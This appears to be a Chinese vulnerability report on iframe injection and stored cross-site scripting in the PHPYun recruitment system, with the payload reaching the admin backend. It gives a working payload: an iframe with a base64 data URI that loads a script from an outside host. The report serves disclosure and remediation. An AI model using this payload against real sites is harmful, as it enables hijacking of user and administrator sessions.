### 简要描述:
php云人才系统 框架注入+存储型xss 跨后台
### 详细说明:
我们来到phpyun的好友新鲜事,发一个状态
`<iframe src=http://www.baidu.com>
<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4=">`
[<img src="https://images.seebug.org/upload/201409/1100241683e1e4d5d95b03e7b3f2248e531b6b24.png" alt="14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1100241683e1e4d5d95b03e7b3f2248e531b6b24.png)
看看效果如何:
[<img src="https://images.seebug.org/upload/201409/110027376d66b8956d41d2218fbdcea75aa51917.png" alt="15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/110027376d66b8956d41d2218fbdcea75aa51917.png)
[<img src="https://images.seebug.org/upload/201409/110027460a73e1a970e22a34609b1c160b8dadda.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/110027460a73e1a970e22a34609b1c160b8dadda.png)
我们去后台也看看是否跨后台了,看朋友圈:
[<img src="https://images.seebug.org/upload/201409/11003245d488bea2381ba373ff080d1eb1827a57.png" alt="19.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/11003245d488bea2381ba373ff080d1eb1827a57.png)
完美执行
再看一个跨后台的,虽然有些鸡肋,我们去申请友情链接:
[<img src="https://images.seebug.org/upload/201409/11002935d56a172db77fa5c26e089172b0d9ad86.png" alt="17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/11002935d56a172db77fa5c26e089172b0d9ad86.png)
在看看管理员审核哪里:
[<img src="https://images.seebug.org/upload/201409/11003133914052a51d3b09596b47641699392638.png" alt="18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/11003133914052a51d3b09596b47641699392638.png)
### 漏洞证明:
京公网安备 11010502034610号
暂无评论